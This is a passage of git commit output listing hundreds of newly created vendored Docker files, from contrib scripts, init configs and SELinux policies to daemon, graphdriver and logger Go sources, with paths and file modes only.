 create mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile
 create mode 100755 vendor/github.com/docker/docker/contrib/check-config.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/completion/REVIEWERS
 create mode 100644 vendor/github.com/docker/docker/contrib/completion/bash/docker
 create mode 100644 vendor/github.com/docker/docker/contrib/completion/fish/docker.fish
 create mode 100644 vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt
 create mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS
 create mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/_docker
 create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go
 create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go
 create mode 100755 vendor/github.com/docker/docker/contrib/dockerize-disk.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/editorconfig
 create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/aliases
 create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/domain-map
 create mode 100755 vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/gitdm.config
 create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris
 create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/server.go
 create mode 100644 vendor/github.com/docker/docker/contrib/init/openrc/docker.confd
 create mode 100644 vendor/github.com/docker/docker/contrib/init/openrc/docker.initd
 create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS
 create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.service
 create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm
 create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.socket
 create mode 100755 vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker
 create mode 100644 vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default
 create mode 100755 vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker
 create mode 100644 vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig
 create mode 100644 vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS
 create mode 100644 vendor/github.com/docker/docker/contrib/init/upstart/docker.conf
 create mode 100755 vendor/github.com/docker/docker/contrib/mac-install-bundle.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-alpine.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-arch.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-busybox.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-crux.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-pld.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-rinse.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-yum.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/busybox-static
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/debootstrap
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/rinse
 create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/solaris
 create mode 100644 vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c
 create mode 100755 vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/project-stats.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/report-issue.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/reprepro/suites.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te
 create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/nano/Dockerfile.nanorc
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/nano/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim
 create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/acct.c
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/exit32.s
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/ns.c
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/raw.c
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/setgid.c
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/setuid.c
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/socket.c
 create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/userns.c
 create mode 100644 vendor/github.com/docker/docker/contrib/udev/80-docker.rules
 create mode 100644 vendor/github.com/docker/docker/contrib/vagrant-docker/README.md
 create mode 100644 vendor/github.com/docker/docker/daemon/apparmor_default.go
 create mode 100644 vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/archive.go
 create mode 100644 vendor/github.com/docker/docker/daemon/archive_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/archive_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/attach.go
 create mode 100644 vendor/github.com/docker/docker/daemon/auth.go
 create mode 100644 vendor/github.com/docker/docker/daemon/bindmount_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/bindmount_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cache.go
 create mode 100644 vendor/github.com/docker/docker/daemon/caps/utils_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/changes.go
 create mode 100644 vendor/github.com/docker/docker/daemon/checkpoint.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/cluster.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/container.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/network.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/node.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/secret.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/service.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/task.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/backend.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/filters.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/helpers.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/provider/network.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/secrets.go
 create mode 100644 vendor/github.com/docker/docker/daemon/commit.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_common_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_experimental.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_operations.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/create.go
 create mode 100644 vendor/github.com/docker/docker/daemon/create_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/create_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_experimental.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap.go
 create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/delete.go
 create mode 100644 vendor/github.com/docker/docker/daemon/delete_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/discovery.go
 create mode 100644 vendor/github.com/docker/docker/daemon/discovery_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/disk_usage.go
 create mode 100644 vendor/github.com/docker/docker/daemon/errors.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events/events.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events/events_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events/filter.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events/metrics.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events/testutils/testutils.go
 create mode 100644 vendor/github.com/docker/docker/daemon/events_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/exec.go
 create mode 100644 vendor/github.com/docker/docker/daemon/exec/exec.go
 create mode 100644 vendor/github.com/docker/docker/daemon/exec_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/exec_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/exec_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/export.go
 create mode 100644 vendor/github.com/docker/docker/daemon/getsize_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/counter.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/plugin.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/proxy.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/health.go
 create mode 100644 vendor/github.com/docker/docker/daemon/health_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_delete.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_exporter.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_history.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_inspect.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_pull.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_push.go
 create mode 100644 vendor/github.com/docker/docker/daemon/image_tag.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images.go
 create mode 100644 vendor/github.com/docker/docker/daemon/import.go
 create mode 100644 vendor/github.com/docker/docker/daemon/info.go
 create mode 100644 vendor/github.com/docker/docker/daemon/info_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/info_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/inspect.go
 create mode 100644 vendor/github.com/docker/docker/daemon/inspect_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/inspect_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/inspect_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/keys.go
 create mode 100644 vendor/github.com/docker/docker/daemon/keys_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/kill.go
 create mode 100644 vendor/github.com/docker/docker/daemon/links.go
 create mode 100644 vendor/github.com/docker/docker/daemon/links/links.go
 create mode 100644 vendor/github.com/docker/docker/daemon/links/links_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/links_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/links_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/links_notlinux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/list.go
 create mode 100644 vendor/github.com/docker/docker/daemon/list_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/list_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logdrivers_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logdrivers_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/context.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/copier.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/copier_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/factory.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_native.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/logger.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/logger_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logs_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/metrics.go
 create mode 100644 vendor/github.com/docker/docker/daemon/monitor.go
 create mode 100644 vendor/github.com/docker/docker/daemon/monitor_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/monitor_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/monitor_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/mounts.go
 create mode 100644 vendor/github.com/docker/docker/daemon/names.go
 create mode 100644 vendor/github.com/docker/docker/daemon/network.go
 create mode 100644 vendor/github.com/docker/docker/daemon/network/settings.go
 create mode 100644 vendor/github.com/docker/docker/daemon/oci_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/oci_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/oci_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/pause.go
 create mode 100644 vendor/github.com/docker/docker/daemon/prune.go
 create mode 100644 vendor/github.com/docker/docker/daemon/rename.go
 create mode 100644 vendor/github.com/docker/docker/daemon/resize.go
 create mode 100644 vendor/github.com/docker/docker/daemon/restart.go
 create mode 100644 vendor/github.com/docker/docker/daemon/search.go
 create mode 100644 vendor/github.com/docker/docker/daemon/search_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_disabled.go
 create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/secrets.go
 create mode 100644 vendor/github.com/docker/docker/daemon/secrets_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/secrets_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/selinux_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/selinux_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/start.go
 create mode 100644 vendor/github.com/docker/docker/daemon/start_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/start_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stop.go
 create mode 100644 vendor/github.com/docker/docker/daemon/top_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/top_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/top_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/unpause.go
 create mode 100644 vendor/github.com/docker/docker/daemon/update.go
 create mode 100644 vendor/github.com/docker/docker/daemon/update_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/update_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/update_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unit_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/wait.go
 create mode 100644 vendor/github.com/docker/docker/daemon/workdir.go
 create mode 100644 vendor/github.com/docker/docker/distribution/config.go
 create mode 100644 vendor/github.com/docker/docker/distribution/errors.go
 create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest
 create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest
 create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest
